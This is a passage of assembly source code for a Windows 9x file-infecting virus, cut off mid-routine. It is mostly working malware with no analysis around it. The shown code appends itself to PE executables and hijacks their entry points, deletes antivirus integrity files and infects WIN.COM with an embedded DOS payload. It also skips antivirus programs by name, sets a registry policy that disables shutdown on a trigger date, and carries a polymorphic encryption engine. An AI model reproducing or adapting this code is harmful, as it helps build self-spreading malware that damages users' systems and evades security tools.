|||
|
mul ecx
|
|||
|
pop esi
|
|||
|
add esi,eax ;esi points now to section header
|
|||
|
|
|||
|
; Section header layout, Tdump names things other (4 example rawdata)
|
|||
|
;
|
|||
|
;esi+0h 8h Section's name (.reloc, .idata, .LiFEwiRE)
|
|||
|
; 8h 4h VirtualSize
|
|||
|
; 0ch 4h RelativeVirtualAdress
|
|||
|
; 10h 4h SizeOfRawData
|
|||
|
; 14h 4h PointerToRawData
|
|||
|
; 18h 4h PointerToRelocations
|
|||
|
; 1ch 4h PointerToLinenumbers
|
|||
|
; 20h 2h NumberOfRelocations
|
|||
|
; 22h 2h NumberOfLinenumbers
|
|||
|
; 24h 4h Characteristics
|
|||
|
|
|||
|
|
|||
|
; ESI points to Section header, EDI points to PE
|
|||
|
|
|||
|
or [esi+24h],sectionflags ; Update section's flagz
|
|||
|
|
|||
|
mov edx,[esi+10h] ; EDX = SizeOfRawData
|
|||
|
mov eax,edx ; EAX = SizeOfRawData
|
|||
|
add edx,[esi+0Ch] ; EDX = New EIP
|
|||
|
add eax,[esi+14h] ; EAX = Where append virus
|
|||
|
push eax ; Save it
|
|||
|
|
|||
|
push esi
|
|||
|
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+50h],eax
|
|||
|
|
|||
|
mov eax,[edi+28h] ;backup entry RVA
|
|||
|
mov dword ptr [ebp+base-start],eax ;...
|
|||
|
mov dword ptr [ebp+newEIP-start],edx ;save it
|
|||
|
|
|||
|
add edx,dword ptr [edi+34h] ;edx=neweip+imagebase
|
|||
|
|
|||
|
mov dword ptr [ebp+distance-start],edx ; Store the address
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
add esi,18h ;esi+18h=start of OptionalHeader
|
|||
|
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
|
|||
|
|
|||
|
;ESI points to the allocation table,EDI to PE
|
|||
|
|
|||
|
;lets find the section which contains the RVA.
|
|||
|
|
|||
|
;then the place where to put the jump is entry-rva+phys.
|
|||
|
|
|||
|
sub esi,28h
|
|||
|
|
|||
|
|
|||
|
look: add esi,28h
|
|||
|
mov edx,eax ;Old EntryPoint (RVA)
|
|||
|
sub edx,dword ptr [esi+0Ch] ;VirtualAddres
|
|||
|
cmp edx,dword ptr [esi+08h] ;VirtualSize
|
|||
|
jae look
|
|||
|
|
|||
|
sub eax,dword ptr [esi+0ch] ;sub RVA
|
|||
|
add eax,dword ptr [esi+14h] ;add PhysicalOffset
|
|||
|
;EAX is now the PhysicalOffset
|
|||
|
;of the EntryPoint
|
|||
|
|
|||
|
or [esi+24h],sectionflags ; Update section's flagz
|
|||
|
|
|||
|
pop esi
|
|||
|
pop edx
|
|||
|
pop ebx
|
|||
|
|
|||
|
push edx ;
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
|
|||
|
lea esi,[ebp+oldbytes-start] ;read pointer to PE at 3ch
|
|||
|
mov ecx,JmpToCodesz ;into pointertope
|
|||
|
mov edx,eax
|
|||
|
mov eax,R0_READFILE
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
mov word ptr [ebp+randombla-start],ax ;random value
|
|||
|
|
|||
|
pop edx ;and write new bytes at entry
|
|||
|
lea esi,[ebp+JmpToCode-start] ;point to make code jmp to
|
|||
|
mov eax,R0_WRITEFILE ;the section which contains
|
|||
|
mov ecx,JmpToCodesz ;the viruscode (modifying the
|
|||
|
call R0_FileIO ;entry RVA will alert AV's)
|
|||
|
|
|||
|
call VxDPatch ;unpatch VxDCalls (and VMM)
|
|||
|
|
|||
|
call IncCounter ;a ASCII counter rules
|
|||
|
|
|||
|
call encrypt ;encrypt,createpoly,returnsize (in ecx)
|
|||
|
|
|||
|
;encrypt-^ returns the virus size in ecx
|
|||
|
|
|||
|
mov eax,ecx
|
|||
|
mov ecx,[edi+3Ch] ;ECX = Alignment
|
|||
|
push edx ; Align
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx
|
|||
|
pop edx
|
|||
|
mov ecx,eax ;aligned size to append
|
|||
|
|
|||
|
pop esi
|
|||
|
|
|||
|
add [esi+10h],eax ; Size of rawdata
|
|||
|
mov eax,[esi+10h] ;
|
|||
|
add [esi+08h],eax ; & virtual size
|
|||
|
|
|||
|
pop edx
|
|||
|
push edi
|
|||
|
lea esi,[ebp+viruscopy-start] ;polymorfer returns size in
|
|||
|
mov eax,R0_WRITEFILE ;the ECX register
|
|||
|
push eax
|
|||
|
call R0_FileIO ;append virus
|
|||
|
|
|||
|
pop eax
|
|||
|
pop esi
|
|||
|
mov ecx,1024
|
|||
|
mov edx,[ebp+pointertope-start]
|
|||
|
call R0_FileIO ;overwrite PE header
|
|||
|
|
|||
|
|
|||
|
pop edi
|
|||
|
pop ebp
|
|||
|
|
|||
|
nope:
|
|||
|
mov eax,R0_CLOSEFILE
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
call debug_beep
|
|||
|
endif
|
|||
|
|
|||
|
call killAVfiles
|
|||
|
call infectwindotcom ;for payload
|
|||
|
|
|||
|
jmp dontinfect
|
|||
|
|
|||
|
windotcom db "C:\WINDOWS\WIN.COM",0h ;for payload
|
|||
|
sizewdc equ $-offset windotcom
|
|||
|
|
|||
|
avpcrc db 9,"AVP.CRC",0h
|
|||
|
antivirdat db 14,"ANTI-VIR.DAT",0h
|
|||
|
ivbntz db 9,"IVB.NTZ",0h
|
|||
|
chklistms db 12,"CHKLIST.MS",0h
|
|||
|
|
|||
|
killAVfiles:
|
|||
|
pushad
|
|||
|
;first add the path to the filename
|
|||
|
mov ebp,edi
|
|||
|
|
|||
|
lea edx,[offset avpcrc-start+ebp]
|
|||
|
|
|||
|
mov ecx,4
|
|||
|
killing:
|
|||
|
call killthisfile
|
|||
|
xor ebx,ebx
|
|||
|
mov bl,byte ptr [edx]
|
|||
|
add edx,ebx
|
|||
|
loop killing
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
killthisfile:
|
|||
|
pushad
|
|||
|
lea edi,[offset filename-start+ebp]
|
|||
|
push edi
|
|||
|
|
|||
|
mov al,'.'
|
|||
|
cld
|
|||
|
scasb ;search from left to right for the dot
|
|||
|
jne $-1
|
|||
|
|
|||
|
std
|
|||
|
mov al,'\' ;search from right to left for the \
|
|||
|
scasb
|
|||
|
jne $-1
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
|
|||
|
inc edi ;edi pointed to char before \
|
|||
|
inc edi ;edi pointed to \
|
|||
|
|
|||
|
cld
|
|||
|
|
|||
|
mov esi,edx
|
|||
|
lodsb
|
|||
|
mov cl,al
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop esi
|
|||
|
mov eax,R0_DELETEFILE
|
|||
|
mov ecx,2027h
|
|||
|
call R0_FileIO
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
infectwindotcomflag db 0h
|
|||
|
|
|||
|
infectwindotcom: ;called if virus is not resident
|
|||
|
pushad
|
|||
|
mov byte ptr [edi+offset infectwindotcomflag-start],'!'
|
|||
|
|
|||
|
push edi
|
|||
|
|
|||
|
lea esi,[offset windotcom-start+edi]
|
|||
|
lea edi,[offset filename-start+edi]
|
|||
|
mov ecx,sizewdc
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop edi
|
|||
|
|
|||
|
jmp payloadinfector
|
|||
|
|
|||
|
backfrominfecting:
|
|||
|
|
|||
|
mov byte ptr [edi+offset infectwindotcomflag-start],173d ;<3B>
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
jmpop dw 0e990h ;nop & jmp
|
|||
|
jmpval dw ?
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
payloadinfector:
|
|||
|
if debug eq 1
|
|||
|
cmp dword ptr [esi-8],'PRUB' ;*BURP.COM ?
|
|||
|
jne wegvancom
|
|||
|
endif
|
|||
|
|
|||
|
lea esi, [edi+filename-start]
|
|||
|
|
|||
|
xor ecx,ecx ;ecx=0
|
|||
|
mov edx,ecx ;
|
|||
|
inc edx ;edx=1
|
|||
|
mov ebx,edx ;
|
|||
|
inc ebx ;ebx=2
|
|||
|
mov eax,R0_OPENCREATFILE
|
|||
|
call R0_FileIO
|
|||
|
jc wegvancom
|
|||
|
|
|||
|
mov ebx,eax ;file handle
|
|||
|
|
|||
|
lea esi,[edi+first4bts-start] ;read first 4 bytes
|
|||
|
mov ecx,4
|
|||
|
xor edx,edx
|
|||
|
mov eax,R0_READFILE
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
cmp word ptr [edi+first4bts-start],'ZM' ;a renamed EXE ??
|
|||
|
je closecomfile
|
|||
|
|
|||
|
cmp word ptr [edi+first4bts-start],0e990h ;already infected?
|
|||
|
je closecomfile
|
|||
|
|
|||
|
mov eax,R0_GETFILESIZE
|
|||
|
call R0_FileIO ;get it's size
|
|||
|
|
|||
|
cmp eax,0ffffh-0100h-dospayloadsize ;infectable?
|
|||
|
ja closecomfile
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
sub eax,4
|
|||
|
mov word ptr [edi+jmpval-start],ax ;distance to jmp
|
|||
|
|
|||
|
lea esi,[edi+offset jmpop-start] ;Write new jMP at 0h
|
|||
|
mov eax,R0_WRITEFILE
|
|||
|
mov ecx,4
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
pop eax
|
|||
|
pop edx ;place to append
|
|||
|
push edx
|
|||
|
lea esi,[edi+offset dospayload-start]
|
|||
|
mov ecx,dospayloadsize
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
pop edx ;read 7 bytes before the end
|
|||
|
push edx
|
|||
|
sub edx,7
|
|||
|
mov ecx,7
|
|||
|
mov eax,R0_READFILE
|
|||
|
lea esi,[edi+offset filename-start] ;just a buffer
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
cmp word ptr [edi+offset filename-start+3],'SN' ;ENUNS? (ENU is
|
|||
|
jne closecomfile ;optional)
|
|||
|
|
|||
|
add word ptr [edi+offset filename-start+5],dospayloadsize+7
|
|||
|
|
|||
|
mov ecx,7
|
|||
|
|
|||
|
lea esi,[edi+offset filename-start]
|
|||
|
mov eax,R0_WRITEFILE
|
|||
|
add edx,dospayloadsize
|
|||
|
call R0_FileIO ;append updated ENUNS
|
|||
|
|
|||
|
closecomfile:
|
|||
|
mov eax,R0_CLOSEFILE
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
wegvancom:
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
call debug_beep
|
|||
|
endif
|
|||
|
|
|||
|
cmp byte ptr [edi+offset infectwindotcomflag-start],'!'
|
|||
|
je backfrominfecting
|
|||
|
|
|||
|
jmp quitinfect
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; *** BEEPS used if debug equ 1 ***
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
debug_beep:
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
|
|||
|
mov eax,0bff70408h
|
|||
|
cmp byte ptr [eax],0
|
|||
|
jne geenirritantgebiepvandaag
|
|||
|
|
|||
|
mov al, 0B6h
|
|||
|
out 43h, al
|
|||
|
|
|||
|
mov al, (12345678h/debug_beep_FREQ) and 255
|
|||
|
out 42h, al
|
|||
|
mov al, ((12345678h/debug_beep_FREQ) shr 16) and 255
|
|||
|
out 42h, al
|
|||
|
|
|||
|
in al, 61h
|
|||
|
or al, 3
|
|||
|
out 61h, al
|
|||
|
|
|||
|
mov ecx, debug_beep_DELAY
|
|||
|
loop $
|
|||
|
|
|||
|
in al, 61h
|
|||
|
and al, not 3
|
|||
|
out 61h, al
|
|||
|
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
debug_beep2:
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
|
|||
|
mov al, 0B6h
|
|||
|
out 43h, al
|
|||
|
|
|||
|
mov al, (12345678h/debug_beep_FREQ2) and 255
|
|||
|
out 42h, al
|
|||
|
mov al, ((12345678h/debug_beep_FREQ2) shr 16) and 255
|
|||
|
out 42h, al
|
|||
|
|
|||
|
in al, 61h
|
|||
|
or al, 3
|
|||
|
out 61h, al
|
|||
|
|
|||
|
mov ecx, debug_beep_DELAY2
|
|||
|
loop $
|
|||
|
|
|||
|
in al, 61h
|
|||
|
and al, not 3
|
|||
|
out 61h, al
|
|||
|
|
|||
|
geenirritantgebiepvandaag: ;blaa dit versta jij toch niet looser :P
|
|||
|
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
endif
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; File IO function, called lot of times, better for patching callback
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
R0_FileIO:
|
|||
|
VxD4V equ Ring0_FileIO+256*256*IFSMgr
|
|||
|
VxD4: VxDCall IFSMgr, Ring0_FileIO
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; Increases the ASCII counter of infections
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
IncCounter: ;counts a ASCII counter... when there are more than
|
|||
|
;9999999 files infected it contains a bug, but i don't
|
|||
|
lea esi,[offset counter-start+6+ebp] ;expect that from this vir :)
|
|||
|
|
|||
|
next:
|
|||
|
inc byte ptr [esi]
|
|||
|
cmp byte ptr [esi],'9'+1
|
|||
|
jb ok
|
|||
|
mov byte ptr [esi],'0'
|
|||
|
dec esi
|
|||
|
jmp next
|
|||
|
ok:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Some things used in the registery payload
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
|
|||
|
valuename1 db "NoClose",0h ;no shutdown :)
|
|||
|
ValueToSet dd 1h
|
|||
|
|
|||
|
|
|||
|
CheckThePayloadDate:
|
|||
|
|
|||
|
mov al,07h ;Get day
|
|||
|
out 70h,al ;(returns it in hex btw!)
|
|||
|
in al,71h
|
|||
|
|
|||
|
cmp al,06h ;Is it 6th?
|
|||
|
jnz noPayload
|
|||
|
|
|||
|
mov al,08h ;Get month
|
|||
|
out 70h,al ;(returns it in hex btw!)
|
|||
|
in al,71h
|
|||
|
|
|||
|
cmp al,04h ;Is it 4th?
|
|||
|
jnz noPayload ;(
|
|||
|
|
|||
|
lea eax,[offset pointertope+ebp] ;just a buffer
|
|||
|
push eax
|
|||
|
lea eax,[offset KeyOfPolicies+ebp] ;open this key
|
|||
|
push eax
|
|||
|
push HKEY_CURRENT_USER ;
|
|||
|
VxD6V equ RegOpenKey+256*256*1
|
|||
|
VxD6: VMMCall RegOpenKey
|
|||
|
|
|||
|
add esp,3*4 ;reset stackpointer
|
|||
|
|
|||
|
push 4 ;length of value
|
|||
|
lea eax,[offset ValueToSet+ebp] ;set value true
|
|||
|
push eax
|
|||
|
push REG_DWORD ;type
|
|||
|
push 0 ;reserved
|
|||
|
lea eax,[offset valuename1+ebp]
|
|||
|
push eax
|
|||
|
push [pointertope+ebp] ;handle
|
|||
|
VxD7V equ RegSetValueEx+256*256*1 ;1 = VMM
|
|||
|
VxD7: VMMCall RegSetValueEx
|
|||
|
|
|||
|
add esp,6*4
|
|||
|
|
|||
|
noPayload:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; Patches the VxDCalls (on execute windows modifies them to a real call)
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
VxDPatch:
|
|||
|
pushad
|
|||
|
mov bx,020cdh ;int 20 used by VxDCall
|
|||
|
|
|||
|
mov word ptr [VxD1-start+ebp],bx ;int 20
|
|||
|
mov dword ptr [VxD1-start+ebp+2],VxD1V ;dd with IFSMGR & fn.
|
|||
|
|
|||
|
mov word ptr [VxD2-start+ebp],bx
|
|||
|
mov dword ptr [VxD2-start+ebp+2],VxD2V
|
|||
|
|
|||
|
mov word ptr [VxD3-start+ebp],bx
|
|||
|
mov dword ptr [VxD3-start+ebp+2],VxD3V
|
|||
|
|
|||
|
mov word ptr [VxD4-start+ebp],bx
|
|||
|
mov dword ptr [VxD4-start+ebp+2],VxD4V
|
|||
|
|
|||
|
mov word ptr [VxD5-start+ebp],bx
|
|||
|
mov dword ptr [VxD5-start+ebp+2],VxD5V
|
|||
|
|
|||
|
mov word ptr [VxD6-start+ebp],bx
|
|||
|
mov dword ptr [VxD6-start+ebp+2],VxD6V
|
|||
|
|
|||
|
mov word ptr [VxD7-start+ebp],bx
|
|||
|
mov dword ptr [VxD7-start+ebp+2],VxD7V
|
|||
|
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
rnd32_seed dd 0h
|
|||
|
|
|||
|
|
|||
|
;------ this code is putted at EIP of host and jmps to virus code -----------;
|
|||
|
JmpToCode:
|
|||
|
stc
|
|||
|
db 066h,0fh,083h ;jnc
|
|||
|
randombla dw ? ;some place
|
|||
|
mov eax,12345678h
|
|||
|
distance equ $-4
|
|||
|
push eax
|
|||
|
ret
|
|||
|
EndJmpToCode:
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
;this sweet code will be appended to .com files (234 / 0eah bytes large)
|
|||
|
|
|||
|
dospayload label byte
|
|||
|
db 0e8h,09h,00h,0ebh,012h,08bh,0ech,083h,0c4h,020h,0ebh,04h,0ebh
|
|||
|
db 0fch,0cdh,021h,0e8h,02ch,00h,0ebh,0eeh,0e2h,0f9h,058h,08bh
|
|||
|
db 0ech,02dh,03h,01h,0fbh,095h,0b4h,04ch,080h,0ech,022h,0cdh,021h
|
|||
|
db 080h,0feh,07h,075h,05h,080h,0fah,07h,074h,017h,0beh,0eah,01h
|
|||
|
db 03h,0f5h,0bfh,00h,01h,0a5h,0a5h,0b8h,00h,01h,050h,0c3h,0ebh
|
|||
|
db 05h,0b8h,00h,04ch,0cdh,021h,0c3h,0beh,058h,01h,03h,0f5h,08bh
|
|||
|
db 0feh,0b9h,092h,00h,0fch,0ach,0f6h,0d8h,0aah,0e2h,0fah,018h
|
|||
|
db 07dh,00h,098h,00h,048h,0f9h,047h,0f6h,00h,018h,08dh,00h,042h
|
|||
|
db 070h,0ffh,0fdh,0bh,018h,0a8h,00h,018h,0abh,00h,047h,0d4h,0ffh
|
|||
|
db 018h,09eh,00h,018h,0b4h,00h,06h,015h,02h,0a0h,04ch,0d4h,033h
|
|||
|
db 0dfh,076h,026h,04ch,0d4h,033h,0dfh,0d6h,02dh,080h,06h,0ech
|
|||
|
db 08eh,0bh,09fh,03dh,0a9h,09fh,095h,09bh,0e0h,08bh,090h,0d4h
|
|||
|
db 0e0h,0b2h,09bh,091h,0d2h,0d2h,0d2h,00h,0ach,098h,09bh,0e0h
|
|||
|
db 0b3h,09fh,08ch,08eh,097h,088h,0e0h,098h,09fh,08dh,0e0h,087h
|
|||
|
db 091h,08bh,0d2h,0d2h,0d2h,00h,089h,0c7h,088h,0d2h,093h,0bfh
|
|||
|
db 0ach,0aeh,097h,0a8h,0e0h,0adh,0aah,0a8h,00h,018h,0eah,00h,0cdh
|
|||
|
db 01h,04ch,0f6h,054h,055h,018h,055h,01h,0f6h,040h,08bh,09h,047h
|
|||
|
db 0e2h,00h,018h,05fh,01h,01eh,05h,03dh,048h,0fdh,00h,033h,0f0h
|
|||
|
db 04ch,0ffh,04bh,0e0h,033h,0f0h,03dh
|
|||
|
first4bts dd ? ;the first 4 overwritten bytes from the host
|
|||
|
dospayloadsize equ $-offset dospayload
|
|||
|
|
|||
|
badnames label byte
|
|||
|
db 04h,"_AVP" ;_AVP files
|
|||
|
db 03h,"NAV" ;Norton AV
|
|||
|
db 02h,"TB" ;Tbscan, Tbav32, whole shit
|
|||
|
db 02h,"F-" ;F-Prot
|
|||
|
db 03h,"PAV" ;Panda AV
|
|||
|
db 03h,"DRW" ;Doc. Web
|
|||
|
db 04h,"DSAV" ;Doc. Salomon
|
|||
|
db 03h,"NOD" ;NodIce
|
|||
|
db 03h,"SCA" ;SCAN
|
|||
|
db 05h,"NUKEN" ;Nukenabber? (error with infecting)
|
|||
|
db 04h,"YAPS" ;YetAnotherPortScanner (selfcheck)
|
|||
|
db 03h,"HL." ;HalfLife (thx to Ghostie!)
|
|||
|
db 04h,"MIRC" ;mIRC = strange
|
|||
|
db 0h
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; * Checks the name of the file to be infected
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
checkname: ;check for some bad names
|
|||
|
pushad
|
|||
|
|
|||
|
mov ebp,edi ;delta
|
|||
|
mov edi,esi ;points to filename
|
|||
|
|
|||
|
mov al,'.'
|
|||
|
cld
|
|||
|
scasb ;search from left to right for the dot
|
|||
|
jne $-1
|
|||
|
|
|||
|
std
|
|||
|
mov al,'\' ;search from right to left for the \
|
|||
|
scasb
|
|||
|
jne $-1
|
|||
|
|
|||
|
inc edi ;edi pointed to char before \
|
|||
|
inc edi ;edi pointed to \
|
|||
|
|
|||
|
cld
|
|||
|
|
|||
|
lea esi,[offset badnames+ebp-start]
|
|||
|
|
|||
|
checkname2:
|
|||
|
xor eax,eax ;for load AL
|
|||
|
lodsb ;size of string in al
|
|||
|
or al,al
|
|||
|
jz didit
|
|||
|
mov ecx,eax ;counter for bytes
|
|||
|
push edi ;save pointer to filename
|
|||
|
rep cmpsb ;compare stringbyte
|
|||
|
pop edi
|
|||
|
jz ArghItIsAshitFile
|
|||
|
add esi,ecx
|
|||
|
jmp checkname2
|
|||
|
|
|||
|
ArghItIsAshitFile:
|
|||
|
popad
|
|||
|
stc
|
|||
|
ret
|
|||
|
didit:
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; *** POLYMORFIC engine which generates decrypter & encrypts code ***
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;
|
|||
|
; The generated code will look like this:
|
|||
|
;
|
|||
|
; pushad
|
|||
|
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
|
|||
|
; mov keyregister,randomvalue
|
|||
|
; sub keyregister,randomvalue
|
|||
|
; mov counterreg,size
|
|||
|
; again:
|
|||
|
; mov tempregister,[RegUsedAsPointer]
|
|||
|
; xor tempregister,keyregister
|
|||
|
; mov [RegUsedAsPointer],tempregister
|
|||
|
; add RegUsedAsPointer,4
|
|||
|
; dec counterreg
|
|||
|
; pushf
|
|||
|
; popf
|
|||
|
; jz exit
|
|||
|
; jmp again
|
|||
|
; exit:
|
|||
|
;
|
|||
|
;
|
|||
|
; between each instruction some random code is putted.
|
|||
|
|
|||
|
polysz equ offset polyend - offset encrypt
|
|||
|
encrypt:
|
|||
|
push eax
|
|||
|
push ebx
|
|||
|
push edx
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
|
|||
|
lea edi,[offset viruscopy+ebp-start] ;edi points to buffer
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
;--------PUSHAD--
|
|||
|
mov al,60h ;pushad
|
|||
|
stosb
|
|||
|
;--------MOV-----
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
getregforoffset: ;This reg will contain the offset of code
|
|||
|
call getrndal
|
|||
|
cmp al,4 ;do not use ESP
|
|||
|
je getregforoffset
|
|||
|
cmp al,5 ;do not use EBP (!)
|
|||
|
je getregforoffset
|
|||
|
|
|||
|
mov ch,al ;backup register for offset code
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;--LEA reg,[EAX+x]- ;lea
|
|||
|
shl al,3
|
|||
|
mov ah,08dh
|
|||
|
xchg ah,al
|
|||
|
add ah,080h
|
|||
|
push edi ;save location for patch
|
|||
|
stosw
|
|||
|
stosd ;doesn't matter what we store
|
|||
|
;------------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
getregforkey: ;This reg will contain the crypt key
|
|||
|
call getrndal
|
|||
|
cmp al,4 ;do not use ESP
|
|||
|
je getregforkey
|
|||
|
cmp al,1 ;do not use ECX
|
|||
|
je getregforkey
|
|||
|
cmp al,ch
|
|||
|
je getregforkey
|
|||
|
|
|||
|
mov cl,al ;backup register
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
;--------MOV-----
|
|||
|
add al,0b8h ;make a MOV reg, rndvalue
|
|||
|
stosb
|
|||
|
call get_rnd32
|
|||
|
stosd
|
|||
|
;----------------
|
|||
|
|
|||
|
mov ebx,eax ;backup key
|
|||
|
mov ah,cl ;register back in ah
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
;--------SUB-----
|
|||
|
mov al,081h ;make a SUB reg, rndvalue
|
|||
|
add ah,0e8h
|
|||
|
stosw
|
|||
|
call get_rnd32
|
|||
|
stosd
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
sub ebx,eax ;Save the cryptkey
|
|||
|
|
|||
|
|
|||
|
getregforsize:
|
|||
|
call getrndal
|
|||
|
cmp al,4 ;do not use ESP
|
|||
|
je getregforsize
|
|||
|
cmp al,cl ;nor keyreg
|
|||
|
je getregforsize
|
|||
|
cmp al,ch ;nor offsetreg
|
|||
|
je getregforsize
|
|||
|
|
|||
|
mov dh,al
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
;----MOVSIZE----- ;mov ecx,virussize (size to decrypt)
|
|||
|
add al,0b8h
|
|||
|
stosb
|
|||
|
mov eax,virusz/4
|
|||
|
stosd
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
|
|||
|
|
|||
|
;8b + 00, eax=3,[eax=0] ch = reg2
|
|||
|
|
|||
|
|
|||
|
getregtoxor: ;This reg will contain crypted code and'll be xored
|
|||
|
call getrndal
|
|||
|
cmp al,4 ;do not use ESP
|
|||
|
je getregtoxor
|
|||
|
cmp al,cl
|
|||
|
je getregtoxor ;do not use the keyreg
|
|||
|
cmp al,ch
|
|||
|
je getregtoxor ;do not use the offset reg
|
|||
|
cmp al,dh
|
|||
|
je getregtoxor
|
|||
|
|
|||
|
|
|||
|
mov dl,al
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;-MOV REG3,[REG2] ;make a mov reg3,[reg2] reg2=offset code
|
|||
|
shl al,3
|
|||
|
or al,ch
|
|||
|
mov ah,08bh
|
|||
|
xchg al,ah
|
|||
|
stosw
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;-XOR REG3,REG1-- ;make a xor reg3,reg1 reg1=key
|
|||
|
mov al,dl
|
|||
|
shl al,3
|
|||
|
or al,cl
|
|||
|
add al,0c0h
|
|||
|
mov ah,33h
|
|||
|
xchg al,ah
|
|||
|
stosw
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
mov al,dl
|
|||
|
|
|||
|
;-MOV [REG2],REG3 ;make a mov [reg2],reg3 reg2=offset code
|
|||
|
shl al,3
|
|||
|
or al,ch
|
|||
|
mov ah,089h
|
|||
|
xchg al,ah
|
|||
|
stosw
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;-ADD REG2,4----- ;adds 4 to the offset register
|
|||
|
mov al,83h
|
|||
|
stosb
|
|||
|
mov ax,004c0h
|
|||
|
add al,ch
|
|||
|
stosw
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;---DEC REG4----- ;decreases counter reg4 (size)
|
|||
|
mov al,dh
|
|||
|
add al,048h
|
|||
|
stosb
|
|||
|
;----------------
|
|||
|
|
|||
|
mov eax,9c66h ;pushf
|
|||
|
stosw
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
inc ah ;popf
|
|||
|
stosw
|
|||
|
|
|||
|
|
|||
|
;---JZ OVER------
|
|||
|
mov ax,074h
|
|||
|
stosw
|
|||
|
push edi
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
mov eax,edi ;can't generate > 80h-5 bytes of garbage
|
|||
|
regenerate: ;between JZ beh - poly - JMP - beh: code...
|
|||
|
mov edi,eax ;restore EDI for ja
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
mov edx,edi
|
|||
|
sub edx,eax
|
|||
|
